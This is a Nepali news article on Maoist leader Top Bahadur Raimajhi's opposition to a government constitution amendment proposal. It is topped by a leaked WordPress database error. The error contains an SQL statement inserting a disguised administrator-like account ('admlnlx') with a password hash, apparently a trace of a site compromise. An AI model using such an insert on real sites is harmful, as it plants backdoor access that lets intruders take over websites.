WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B3..lQE.y/Y8JwewXvMXgKXrdJQZzF0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 06:14:10', '', 'admlnlx', 'admlnlx')
काठमाडौं, मंसिर १९–
नेकपा माओबादी केन्द्रका प्रभावशाली नेता टोपबहादुर रायमाझीले संविधान संसोधनको प्रस्ताव माओबादी केन्द्रको प्रस्ताव नभई सरकारको प्रस्ताव भएको बताएका छन् ।
पार्टी भित्र कुनै छलफल नगरि जानकारी मात्र गराएको आधारमा पार्टीको प्रस्ताव भन्न नमिल्ने भन्दै उनले माओबादी केन्द्रबाट संविधान संसोधनको प्रस्ताव पास नभएको जिकिर गरे ।
संवाद क्लव नेपालले राजधानीमा आयोजना गरेको अन्तरसंवाद कार्यक्रममा बोल्दै रायमाझीले आन्दोलनकारीको माग पनि नभएको र त्यहाँका जनता र जनप्रतिनीधीको भावना विपरित कसको चाहानामा प्रस्ताव आएको यसले आफू आश्चर्यमा परेको बताए ।
जनचाहाना विपरित आएको प्रस्ताव कुनै पनि हालतमा पास नहुने भन्दै रायमाझीले सडक र सदनबाट व्यापक रुपमा प्रस्तावको प्रतिकार हुने बताए । आफू जनताबाट निर्वाचीत प्रतिनिधी भएकाले जनता असन्तुष्ट भएको अवस्थामा आफूले संसोधन प्रस्तावको पक्षपोषण गर्न नसक्ने बताए ।
सरकारले दर्ता गराएको संविधान संसोधनको प्रस्ताव पास गरिए पाँच नम्बर प्रदेशमा मात्र होइन प्रत्यक प्रदेशमा किचलो सुरु हुने उनले भनाई छ । संविधान संसोधनको विषय पार्टीको निजी मामीला हुन नसक्ने भन्दै उनले यसमा पार्टीले ह्वीप लगाउन नसक्ने र आफू जस्तोसुकै अवस्थामा पनि संविधान संसोधनको प्रस्तावको विपक्षमा उभिने प्रतिबद्धता व्यत्त गरे ।